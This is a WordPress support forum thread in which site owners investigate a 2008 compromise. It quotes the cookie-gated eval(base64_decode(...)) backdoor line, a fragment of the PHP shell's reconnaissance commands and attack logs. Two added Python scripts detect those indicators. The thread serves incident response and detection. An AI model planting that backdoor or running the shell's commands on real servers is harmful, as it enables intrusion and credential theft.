Title: Security issue, multiple sites
Last modified: August 19, 2016

---

# Security issue, multiple sites

 *  [Summer](https://wordpress.org/support/users/fpmsummer/)
 * (@fpmsummer)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/)
 * This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1,
   2.3.2, 2.3.3 and 2.5
 * A couple of the sites had wp-content/uploads writable so they could upload images
   for use in posts, and files in wp-content/themes writable so they could make 
   theme updates from inside WP.
 * Back in early March, I found that several sites had been hit with the [ro8kfbsmag.txt](http://wordpress.org/support/topic/141041)
   hack as mentioned in several threads here, and I’d cleaned those up and upgraded
   to 2.3.3, since 2.5 wasn’t yet available as a release.
 * This past weekend, I discovered several of those sites plus a few additional 
   ones, including 2 brand new sites with 2.5 installed, had many of their files
   in the writable directories compromised, a bunch of suspicious files uploaded,
   and database modifications that I cannot explain.
 * I’m still trying to unravel the mess and clean it up, but here’s a rundown of
   tell-tale signs I’ve found.
 * Check any .php file for this code added to the top of the file:
   `<?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>`
 * See if there are any files in writable directories that have the same name as
   an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg,
   or .php.giff. These files will be executables that when called from a browser
   will display a fake “404 Not Found” error, but if called from a script with the
   matching hash from one of the hacked PHP scripts, will display system info about
   the server your site is sitting on. Haven’t yet figured out where or how that
   info is sent to anyone.
 * I can send a copy of the script to anyone in WP security if needed, but I don’t
   know if this kind of thing is preferred to be attached, inline, or zipped, or
   anything.
 * Also see if there’s a wp-info.txt file anywhere in your hierarchy. This file 
   will contain userinfo dumped from the MySQL database… usernames, emails, passwords,
   everything. Move it ASAP, but check your logs to see if it was accessed already.
 * One other thing I noticed, and this happened on the new 2.5 installs as well 
   as the older ones that hadn’t been upgraded yet, was the silent addition of the
   user “WordPress”, with no info save a password, and an add date of all zeroes.
   There’s also no indication of user level in the database, and the user doesn’t
   show up in the User menu. However, when I was going through and deleting unnecessary
   “admin” logins, “WordPress” came up as one of the user options to reassign posts
   to… otherwise it might have been a while before I’d found that buried in the 
   database.
 * So I’ve asked all the users on those sites to update their passwords, even if
   they’d just changed them after the ro8kfbsmag hack, but I have to wonder if I
   missed anything when cleaning up after that hack that they used to continue to
   get in and do the more widespread and scary stuff of planting of these new scripts
   to collect system info.
 * As far as I can tell, some of these sites may have been compromised for as long
   as a month, but all of the added files I’ve listed here were added on Apr 10 
   and Apr 11, except for one site that seems to have had those changes made on 
   Apr 5.
 * I am in the process of changing the DB passwords on those sites, and deleting
   the new “WordPress” user, but any insight on where this might have started would
   be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 
   2.5
 * What I don’t know yet is if one site was the “in” door, and the rest were compromised
   by the one script, or if the sites were individually hacked the same way.

Viewing 15 replies - 1 through 15 (of 53 total)

1 [2](https://wordpress.org/support/topic/security-issue-multiple-sites/page/2/?output_format=md)
[3](https://wordpress.org/support/topic/security-issue-multiple-sites/page/3/?output_format=md)
[4](https://wordpress.org/support/topic/security-issue-multiple-sites/page/4/?output_format=md)
[→](https://wordpress.org/support/topic/security-issue-multiple-sites/page/2/?output_format=md)

 *  Thread Starter [Summer](https://wordpress.org/support/users/fpmsummer/)
 * (@fpmsummer)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-739893)
 * Addendum: I only just noticed this morning while still cleaning up, and
   it seems like they changed the WP version to 2.5 in the database.
 * I’m logged into a site I know is still running 2.1.3, but the footer in the admin
   panels says 2.5 now. I still haven’t found a clue about this invisible user “WordPress”
   with no info about privileges, though.
 *  [Roy](https://wordpress.org/support/users/gangleri/)
 * (@gangleri)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-739959)
 * There already is a thread about this subject and that one has just become active
   again. Maybe you want to join:
    [http://wordpress.org/support/topic/141041?replies=30](http://wordpress.org/support/topic/141041?replies=30)
 *  [jedsundwall](https://wordpress.org/support/users/jedsundwall/)
 * (@jedsundwall)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740014)
 * [@gangleri](https://wordpress.org/support/users/gangleri/),
 * I think FPMSummer is experiencing something different than what’s being discussed
   on that other thread. I’m having the EXACT same problem. I’ve had to revert my
   server to a week and a half old backup. It’s a huge pain. I can’t tell if they
   accessed the wp-info.txt, but I deleted it right away.
 *  Thread Starter [Summer](https://wordpress.org/support/users/fpmsummer/)
 * (@fpmsummer)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740015)
 * Ganglieri,
 * that’s a different hack, but one that hit some sites on our ISP’s shared server
   back in January/February. They removed like 8-10 instances of that .txt file.
 * Jed,
 * what version(s) of WP are you running? I had thought that a 2.3.x site that still
   had user registration turned on might be responsible, but at this point I honestly
   don’t know where the first point of entry was, and I’m still not sure all of 
   the users on this server have changed their passwords. I have changed all the
   database passwords, though.
 *  [jedsundwall](https://wordpress.org/support/users/jedsundwall/)
 * (@jedsundwall)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740016)
 * Like you, I had a number of sites running different versions. I believe most 
   of them were the latest version before 2.5 was released. It’s difficult to tell
   because the hacker has changed all of my WP dashboards to say they’re running
   2.5.
 * All of the weird files showed up on April 10th or 11th, and I didn’t notice them
   until today. My hosting company keep server logs for more than a couple of days,
   so I can’t tell what the point of entry was either.
 * I’m sorry I’m not of much help. All I know is that nothing obviously bad has 
   happened yet. As soon as my server’s finished reverting back to April 5th, I’ll
   be upgrading everything right away.
 *  [appleo](https://wordpress.org/support/users/appleo/)
 * (@appleo)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740019)
 * No real answers here either. This is just to confirm a similar situation. A server
   with 100+ vhosted accounts, and almost all the wordpress installations (various
   versions thru 2.5) were seemingly hit. All on the 11th, and every one within 
   several minutes, according to timestamps. Which would seem to argue for a single
   point of entry. But the sheer volume (hundreds of files) might suggest otherwise.
   Almost everything was either a wordpress file, or something disguised to look
   like a wordpress file. The script did look for writable areas, and occasionally
   found non-wordpress stuff, but that was the exception. There were two signatures.
   Files altered as FPMSummer posted with the first line changed. And new files 
   where all the voodoo was (422 lines), with the first line:
 * `<?php if(md5($_COOKIE['qwerty'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){`
 * I believe all of these were ‘qwerty’ cookies. Grepping for either of those cookie
   names will find all the filesystem damage. A sample of that code:
 *     ```
       // Fragment of the 422-line shell. $safe_mode, $os_type and execute() are
       // set earlier in the same file and are not reproduced in the post.
       if(!$safe_mode){
         if($os_type == 'nix'){
           $os .= execute('sysctl -n kern.ostype');
           $os .= execute('sysctl -n kern.osrelease');
           $os .= execute('sysctl -n kernel.ostype');
           $os .= execute('sysctl -n kernel.osrelease');
           if(empty($user)) $user = execute('id');
           $aliases = array(
             '' => '',
             'find suid files'=>'find / -type f -perm -04000 -ls',
             'find sgid files'=>'find / -type f -perm -02000 -ls',
             'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
             'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
             'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
             'show opened ports'=>'netstat -an | grep -i listen',
           );
         }else{
           $os_name .= execute('ver');
           $user .= execute('echo %username%');
           $aliases = array(
             '' => '',
             'show runing services' => 'net start',
             'show process list' => 'tasklist'
           );
         }
       }
       ```
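The file-system indicators from the opening post (the cookie-gated line prepended to `.php` files, shadow copies named `_new.php`, `_old.php`, `.php.pngg`, `.php.jpgg` or `.php.giff`, and `wp-info.txt`) and the second cookie name appleo found can be checked in one pass. The scanner below is an added example and not code from the thread; it walks an install, reads only the head of each PHP-like file for the `md5($_COOKIE[...])==` gate whatever the cookie name, reports suspicious names together with the legitimate file each one shadows, and lists any credential dump. The tree it runs on is constructed in a temporary directory from inert stand-ins (the payload is elided), so it is safe to run anywhere; the `dfa1bcf4...` hash is the one quoted above, the other is `md5('')`.

```python
import os
import re
import shutil
import tempfile

# Names the thread reports next to legitimate files. Stripping the suffix and
# adding ".php" gives the file each one shadows (index_old.php -> index.php).
SUSPICIOUS_SUFFIXES = ("_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")
DUMP_NAMES = {"wp-info.txt"}
HEAD_BYTES = 4096  # the gate is prepended, so the head of the file is enough

# The cookie gate of the prepended line, for any cookie name
# (the thread mentions '_wp_debugger' and 'qwerty').
BACKDOOR_RE = re.compile(
    r"""md5\(\s*\$_COOKIE\[\s*['"](?P<cookie>[^'"]+)['"]\s*\]\s*\)\s*==\s*['"](?P<hash>[^'"]+)['"]"""
)


def scan_wp_tree(root):
    """Walk an install and return the three kinds of indicator as relative paths."""
    found = {"backdoored": [], "suspicious_names": [], "dumps": []}
    for dirpath, _dirs, names in os.walk(root):
        present = set(names)
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name in DUMP_NAMES:
                found["dumps"].append(rel)
            suffix = next((s for s in SUSPICIOUS_SUFFIXES if name.endswith(s)), None)
            if suffix:
                shadowed = name[: -len(suffix)] + ".php"
                found["suspicious_names"].append(
                    {"path": rel, "shadows": shadowed if shadowed in present else None})
            if suffix or name.endswith(".php"):
                with open(path, "rb") as fh:
                    head = fh.read(HEAD_BYTES).decode("latin-1")
                m = BACKDOOR_RE.search(head)
                if m:
                    found["backdoored"].append(
                        {"path": rel, "cookie": m.group("cookie"), "hash": m.group("hash")})
    for key in found:
        found[key].sort(key=lambda x: x if isinstance(x, str) else x["path"])
    return found


def write_fixture(root):
    """Constructed tree for the demo: inert stand-ins, not the real shell."""
    files = {
        "index.php": "<?php require './wp-blog-header.php'; ?>\n",
        "wp-content/themes/default/index.php": "<?php get_header(); ?>\n",
        # the prepended gate from the first post, payload elided, hash = md5('')
        "wp-content/themes/default/header.php":
            "<?php if(md5($_COOKIE['_wp_debugger'])==\"d41d8cd98f00b204e9800998ecf8427e\")"
            "{ /* payload elided */ exit; } ?>\n<?php get_header(); ?>\n",
        # the 'qwerty' variant, named like a shadow copy of index.php
        "wp-content/themes/default/index_old.php":
            "<?php if(md5($_COOKIE['qwerty'])==\"dfa1bcf40aa72fdb46ed40f7651fe76e\"){\n"
            "/* shell body elided */\n}\n",
        "wp-content/uploads/footer.php.giff": "<?php echo '404 Not Found'; ?>\n",
        "wp-content/uploads/wp-info.txt": "constructed placeholder for the credential dump\n",
        "wp-content/uploads/photo.jpg": "\xff\xd8\xff",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(body)


def demo():
    """Build the fixture in a temp dir, scan it, clean up, return the findings."""
    root = tempfile.mkdtemp(prefix="wpscan_")
    try:
        write_fixture(root)
        return scan_wp_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

On a real install call `scan_wp_tree("/path/to/site")` instead of `demo()`. Matching only the cookie gate rather than a fixed hash is deliberate: the hash differs per site, the cookie name differs per wave, and the page's own samples show both.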
   
 *  Thread Starter [Summer](https://wordpress.org/support/users/fpmsummer/)
 * (@fpmsummer)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740020)
 * Yep, that’s exactly what showed up on my sites, and all on Apr 10 and Apr 11.
   The Apr 11 happened in two waves, 3 hours apart. The first batch of files seemed
   to have all been renamed _old.php, and the second batch of files were the exact
   same files, but with _new.php.
 * I had a lot of WP files with that qwerty cookie added, and several instances 
   of the wp-info.txt with the mysql usernames/passwords dump.
 * I did find one file dated Apr 5, but I also saw a lot of log activity going back
   into March.
 * And how did they change my Dashboard to show WP 2.5, when they weren’t running
   2.5?
 *  [s](https://wordpress.org/support/users/sofimi/)
 * (@sofimi)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740022)
 * guys, i think somebody should “name” this vulnerability so it’s easier to remember.
   also, i wrote about it [here](http://wordpressphilippines.org/blog/has-your-wordpress-been-hacked-recently/).
 * yep, it happened to me too. i first saw the version 2.5 string in the footer 
   and was immediately suspicious, but at first i thought it was because i used 
   the wpau plugin instead of the cpanel upgrade (which i used to install wp the
   first time around). turns out you have to trust your instincts. 🙂
 * i’m also surprised all this happened on april 11 (mine on the 12th) as well.
 * i’ve been watching this page and will continue to do so. i hope more people contribute
   because it was only a few days ago when i tried googling “wp-info.txt” and practically
   nothing came up.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740023)
 * I would agree with anyone who says this isnt just a 2.5 problem
 * [http://www.enunabaldosa.com/deformaciones/wp-includes/wp-info.txt](http://www.enunabaldosa.com/deformaciones/wp-includes/wp-info.txt)
 * The file itself appears to be gone, but because of Google we can get more info
 * [http://64.233.167.104/search?q=cache:5AHDLvNRQt8J:www.enunabaldosa.com/deformaciones/wp-includes/+wp-info.txt&hl=en&ct=clnk&cd=22&gl=us](http://64.233.167.104/search?q=cache:5AHDLvNRQt8J:www.enunabaldosa.com/deformaciones/wp-includes/+wp-info.txt&hl=en&ct=clnk&cd=22&gl=us)
 * That’s a 2.3.3 install **now**. There’s no telling what it was on March 19
 * —
 * Furthermore, people running anything other than 2.3.3, 2.5, or 2.0.11 have taken
   their security into their own hands for some time, and really ought not be surprised
   to wake up to a site that has been exploited.
 *  [here](https://wordpress.org/support/users/here/)
 * (@here)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740025)
 * Codex page will hopefully help document:
 * [http://codex.wordpress.org/Exploits/wp-info](http://codex.wordpress.org/Exploits/wp-info)
 *  [goodspeed1](https://wordpress.org/support/users/goodspeed1/)
 * (@goodspeed1)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740027)
 * We experienced everything mentioned above over the last couple of days, April
   6th & 12th. It seems systematic. Once the accounts had been compromised, the
   hacking began.
 * Here’s a few more insights on what happened: [http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt](http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt)
 * steps taken:
 * 1. Changed the admin (level 10) account passwords
   2. Deleted the ‘mysterious’ WordPress admin user
   3. Upgraded most of major blogs to 2.5
 * So far so good. (crossing my fingers)
 *  [here](https://wordpress.org/support/users/here/)
 * (@here)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740031)
 * The wiki page was moved to [http://codex.wordpress.org/User:Here/Exploits/wp-info](http://codex.wordpress.org/User:Here/Exploits/wp-info)
 *  [indigothirdeye](https://wordpress.org/support/users/indigothirdeye/)
 * (@indigothirdeye)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740033)
 * The hack I believe used a vulnerability in the wp-admin/theme-editor.php. Luckily,
   we have a script that checks for code changes, and caught the exploit within 
   a half hour of the attack. The logs from our site that was hacked had this in
   the logs:
 *     ```
       194.110.162.79 - - [15/Apr/2008:14:40:02 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:03 -0700] "GET /wp-login.php?redirect_to=%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dwp-content%2Fthemes%2Fdefault%2Findex.php%26theme%3DWordPress%2BDefault HTTP/1.1" 200 2043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:03 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 200 9620 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:04 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:04 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default&a=te HTTP/1.1" 200 9832 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:05 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:06 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 7895 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:07 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       194.110.162.79 - - [15/Apr/2008:14:40:08 -0700] "GET /wp-login.php HTTP/1.1" 200 1835 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
       ```
   
 * Both sites had the WordPress and WordPressx user added to the wp-users table.
   Neither had a wp-info.txt luckily, but many of the .giff and .pngg’s were found.
   There were also 2 files in the /tmp/ directory numbered 1 and 2 with full directory
   listings of the sites. We immediately launched a “Deny any” on the theme-editor.php
   files to prevent further attacks using this method and cleaned up what we
   could find.
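A detection for the sequence in the log above, as an added example and not part of the post: it pairs each POST to `theme-editor.php` with a later POST, from the same address and within a short window, to the very file named in the edit's `file=` parameter, and records whether that address fetched `wp-login.php` beforehand and whether it ever POSTed credentials to it. The log lines are constructed after the posted ones, with documentation-range addresses in place of the real one. Whatever the initial entry point was, this pairing only occurs once someone holds an admin session, so a hit timestamps the abuse of an admin login rather than explaining how that login was obtained.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
Req = namedtuple("Req", "ip time method path status")

EDITOR = "/wp-admin/theme-editor.php"
LOGIN = "/wp-login.php"

# Constructed lines modelled on the sequence posted above (203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges, so no real host is named).
UA = '"-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309"'
EDIT = EDITOR + "?file=wp-content/themes/default/index.php&theme=WordPress+Default"
SAMPLE_LOG = [
    f'203.0.113.7 - - [15/Apr/2008:14:40:02 -0700] "GET {EDIT} HTTP/1.1" 302 - {UA}',
    f'203.0.113.7 - - [15/Apr/2008:14:40:03 -0700] "GET {LOGIN}?redirect_to=%2Fwp-admin%2Ftheme-editor.php HTTP/1.1" 200 2043 {UA}',
    f'203.0.113.7 - - [15/Apr/2008:14:40:03 -0700] "GET {EDIT} HTTP/1.1" 200 9620 {UA}',
    f'203.0.113.7 - - [15/Apr/2008:14:40:04 -0700] "POST {EDIT} HTTP/1.1" 302 - {UA}',
    f'203.0.113.7 - - [15/Apr/2008:14:40:04 -0700] "GET {EDIT}&a=te HTTP/1.1" 200 9832 {UA}',
    f'203.0.113.7 - - [15/Apr/2008:14:40:05 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 43 {UA}',
    # an administrator who opens the editor and saves nothing: no hit
    f'198.51.100.4 - - [15/Apr/2008:15:02:11 -0700] "GET {EDIT} HTTP/1.1" 200 9620 {UA}',
    # an ordinary comment submission: no hit
    f'198.51.100.9 - - [15/Apr/2008:15:10:00 -0700] "POST /wp-comments-post.php HTTP/1.1" 302 - {UA}',
]


def parse_line(line):
    """One combined-format line -> Req, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return Req(m.group("ip"), when, m.group("method"), m.group("path"), int(m.group("status")))


def edited_file(editor_path):
    """Site path of the theme file named in theme-editor.php's file= parameter."""
    target = parse_qs(urlsplit(editor_path).query).get("file", [""])[0]
    return "/" + target.lstrip("/") if target else None


def find_theme_editor_abuse(lines, window=timedelta(seconds=60)):
    """Pair each POST to theme-editor.php with a later POST, from the same address
    and inside `window`, to the very file that edit named."""
    by_ip = defaultdict(list)
    for line in lines:
        req = parse_line(line)
        if req:
            by_ip[req.ip].append(req)
    hits = []
    for ip, reqs in by_ip.items():
        reqs.sort(key=lambda r: r.time)  # stable, so same-second order is kept
        for i, req in enumerate(reqs):
            if req.method != "POST" or not req.path.startswith(EDITOR):
                continue
            target = edited_file(req.path)
            for later in reqs[i + 1:]:
                if later.time - req.time > window:
                    break
                if later.method == "POST" and later.path == target:
                    before = reqs[:i]
                    hits.append({
                        "ip": ip,
                        "edited_at": req.time.isoformat(),
                        "file": target,
                        "executed_after_s": int((later.time - req.time).total_seconds()),
                        # did this address touch the login form first, and did it ever POST to it?
                        "saw_login_page": any(r.path.startswith(LOGIN) for r in before),
                        "login_post": any(r.method == "POST" and r.path.startswith(LOGIN) for r in before),
                    })
                    break
    return hits


if __name__ == "__main__":
    for hit in find_theme_editor_abuse(SAMPLE_LOG):
        print(hit)
```

Feed it `open("access.log")` instead of `SAMPLE_LOG` on a real server. The `login_post` field is worth keeping separate from `saw_login_page`: in the posted lines the editor request succeeds after the login page is merely fetched, and whether a credential POST ever appears for that address is exactly the question the thread is still trying to answer.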
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740035)
 * that’s **not** the exploit. That’s the file access that’s done after someone has
   admin access. AND if you attempt to call that file without being logged in, and
   having the proper permissions, you will find you are promptly redirected to logging
   in, just as you ought to be
 * You cannot access that file as a simple subscriber. You must be an admin
 * Devs (Donncha, specifically) have already looked at something similar weeks ago,
   when I originally saw it happening on another blog that had been exploited.
 * Want to know what ultimately solved the hacking?
 * 1. upgrading the blog
   2. changing the admin passwords
   3. changing all the cookies.
 * and the deny all.. that just forces Apache to do work it doesn’t need to. If you’re
   going to block everyone from using the file, delete it, or ctrl-k the content.
 * You don’t gain anything by looking at 403’s — they’re all proxies or rooted shells.
 * None of this is new, and I’m willing to continue playing devil’s advocate and
   say that until someone comes up with real evidence that 2.5, or even 2.3 is the
   root cause of the problem.. that it’s useless conjecture and fear mongering.
 * If someone has admin access they can do whatever your file permissions allow,
   it’s just that simple. And if they can write to a file, they can create a root
   shell. If they can create a root shell, they can add users to your database,
   etc.. They also no longer need admin access once the php root shell is in place.
 * That’s why when a new version comes out, people are urged to upgrade. Countless numbers
   don’t.
 * This is specifically why I have suggested setting up logging on some of these
   blogs —
 * 1. you’re missing the key piece of the puzzle : how they got admin access in the
   first place.
 * —
 * In fact, you posted the login in your paste above. They can be seen logging in.
 *  [s](https://wordpress.org/support/users/sofimi/)
 * (@sofimi)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/#post-740039)
 * yeah, i do want to know how they got admin access as well. fyi, after i wrote
   about this security issue, the “WordPress” user appeared in the database(s) again.
   does this mean i’d have to generate new database passwords all over again? sigh.

The topic ‘Security issue, multiple sites’ is closed to new replies.

## Tags

 * [database](https://wordpress.org/support/topic-tag/database/)
 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [password](https://wordpress.org/support/topic-tag/password/)
 * [permissions](https://wordpress.org/support/topic-tag/permissions/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 53 replies
 * 32 participants
 * Last reply from: [teragram](https://wordpress.org/support/users/teragram/)
 * Last activity: [17 years, 3 months ago](https://wordpress.org/support/topic/security-issue-multiple-sites/page/4/#post-740243)
 * Status: not resolved

